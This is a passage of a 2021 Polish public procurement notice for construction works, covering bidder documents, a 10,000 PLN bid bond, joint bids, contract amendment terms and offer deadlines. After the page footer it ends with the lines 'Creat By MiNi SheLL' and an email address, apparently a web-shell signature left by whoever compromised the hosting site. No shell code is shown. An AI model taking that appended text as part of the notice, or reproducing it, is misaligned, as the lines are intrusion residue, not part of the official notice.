wykonywania<br/>działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych<br/>w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w<br/>szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz.<br/>220) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym<br/>zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie<br/>uzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku określonego w<br/>pkt. 6.1.4. ppkt. 1) SWZ,<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego<br/>zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2)<br/>SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawcy złożenia wraz z ofertą przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>13.4. Oferta musi zawierać następujące oświadczenia i dokumenty: 1) Formularz ofertowy – do<br/>wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może<br/>sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla<br/>oferty w SWZ i załącznikach). 2) Oświadczenia, o których mowa w pkt 8.1 SWZ; 3)<br/>Oświadczenie, o którym mowa w pkt 8.2 SWZ (jeżeli dotyczy), 4) Zobowiązanie lub inne<br/>dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy). 5) Potwierdzenie umocowania dodziałania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby: a) Zamawiający w celu<br/>potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego<br/>zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub<br/>informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru; b) Wykonawca lub podmiot udostępniający<br/>zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. c) jeżeli w imieniu<br/>Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od<br/>Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub<br/>innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. 6)<br/>Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). 13.5.<br/>Pełnomocnictwo, o którym mowa w rozdziale 13.4 pkt 5) lit c) i pkt 6) SWZ składa się w postaci<br/>elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w<br/>postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie<br/>tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej dokonuje mocodawca. Poświadczenia zgodności cyfrowego odwzorowania<br/>pełnomocnictwa z dokumentem w postaci papierowej może dokonać również notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 10.000,00 PLN (słownie zł:<br/>dziesięć tysięcy zł 00/100).12.2. Wadium może być wniesione w jednej lub kilku następujących formach:a) pieniądzu; b) gwarancjach bankowych; c) gwarancjach ubezpieczeniowych;d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 12.3. Wadium<br/>wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Bank Spółdzielczy w Międzyrzecu Podlaskim nr konta: 97 8039 0006 0040 0400<br/>0143 0003 z adnotacją „Wadium – Znak sprawy: IZP.271.10.2021.EK” 12.4. Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.12.5. Jeżeli<br/>wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem<br/>terminu składania ofert.12.6. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne,<br/>bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z<br/>obowiązującymi przepisami i powinna zawierać następujące elementy: a) nazwę: dającego<br/>zlecenie (Wykonawcy), beneficjenta gwarancji /poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib, b) kwotę wadium, c) termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”, d) zobowiązanie<br/>gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy Pzp. 12.7. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie<br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.<br/>1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. 12.8. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia: a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. b) w przypadku,<br/>o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka<br/>cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki<br/>oświadczenie powinno potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów<br/>załącznika nr 6 do SWZ. c) zobowiązani są oni na wezwanie Zamawiającego, złożyć<br/>podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki<br/>dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy,<br/>który/którzy wykazuje/-ą spełnienie warunku. 10.3. Jeżeli została wybrana oferta Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem<br/>umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z<br/>następujących okoliczności: 1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski<br/>żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej, 2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może<br/>nastąpić w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji<br/>publicznej lub eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenie robót budowlanych , 3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi przez innego wykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o<br/>liczbę dni niezbędnych do wykonania robót przez innego wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji; 4) przedłużenie terminu realizacji zamówienia,<br/>o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu<br/>realizacji zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji<br/>projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami, uzyskania<br/>opinii właściwych organów oraz wydania decyzji przez właściwe organy, przy czym<br/>wprowadzenie w dokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą)<br/>zakresu świadczenia Wykonawcy zawartego w ofercie, stanowiącej załącznik nr 3 do umowy<br/>oraz zwiększeniem wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 1, 5) przedłużenie<br/>terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku<br/>wystąpienia warunków geologicznych lub hydrologicznych odmiennych od założonych w<br/>dokumentacji projektowej i powodujących konieczność wstrzymania robót lub konieczność ich<br/>wykonania przy wykorzystaniu odmiennych od zaprojektowanych rozwiązań technicznych, przy<br/>czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do<br/>wyeliminowania utrudnień związanych z ich wystąpieniem, 6) przedłużenia terminu wykonania<br/>zamówienia w zakresie niezbędnym do wykonania robót zleconych na podstawie art. 455 ust. 1<br/>pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień publicznych,7) zmiany powszechnie<br/>obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację<br/>przedmiotu zamówienia lub świadczenia stron umowy, Pozostałe zmiany umowy zawiera SEKCJA IX – POZOSTAŁE INFORMACJE. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektroniczna skrzynka podawcza: /320c4mampy/SkrytkaESP znajdująca się na platformie ePUAP pod adresem: https://epuap.gov.pl/wps/portal. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8) w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca<br/>powoływał się w celu wykazania spełniania warunków udziału w postępowaniu Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca<br/>samodzielnie spełnia warunki udziału w postępowaniu, w stopniu nie mniejszym niż wymagany<br/>w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu<br/>odpowiednich dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu,9)<br/>zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy wskutek<br/>zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie Zamawiającego, w<br/>tym na skutek zawartej przez Zamawiającego umowy o dofinansowanie zadania.10) wszelkie<br/>zmiany, które będą konieczne do zagwarantowania zgodności umowy z wchodzącymi w życie po<br/>terminie składania ofert lub po zawarciu umowy przepisami prawa w szczególności przepisami o<br/>podatku od towarów i usług w zakresie wynikającym z tych przepisów,2. Nie stanowi zmiany<br/>istotnej umowy w rozumieniu art. 454 ustawy Prawo zamówień publicznych: 1) zmiana danych<br/>teleadresowych, 2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy<br/>(np. zmiana nr rachunku bankowego); 3. Z wnioskiem o zmianę umowy może wystąpić zarówno<br/>Wykonawca, jak i Zamawiający.4. Strona, która występuje z propozycją zmiany umowy, w<br/>oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia i<br/>uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają<br/>formy pisemnej w postaci aneksu do umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com